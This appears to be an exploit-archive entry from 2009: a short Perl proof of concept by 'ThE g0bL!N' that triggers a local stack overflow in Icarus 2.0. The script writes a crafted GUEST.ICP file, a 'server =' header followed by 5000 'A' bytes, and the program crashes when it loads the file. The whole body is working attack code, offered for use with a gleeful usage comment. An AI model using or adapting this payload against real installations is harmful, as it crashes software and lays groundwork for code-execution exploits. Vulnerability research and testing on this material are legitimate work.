id: 6912
date: 07/13/2009
title: Icarus 2.0 (.ICP File) Local Stack Overflow PoC
author: ThE g0bL!N
cves: 

===============================================
Icarus 2.0 (.ICP File) Local Stack Overflow PoC
===============================================


#!/usr/bin/perl
#Icarus 2.0(GUEST.ICP) Local Stack Overflow PoC
#By ThE g0bL!N
#usage: After Clicking On Perl File  Run The Program And Choose Continue  Booom The Program Crashed :)
################################################################
$Header="\x73\x65\x72\x76\x65\x72\x20\x3D" ;
$junk="\x41" x 5000 ;
###################################################################
open(myfile,'>>GUEST.ICP');
print myfile $Header.$junk;
###################################################################



#  0day.today [2023-03-24]  #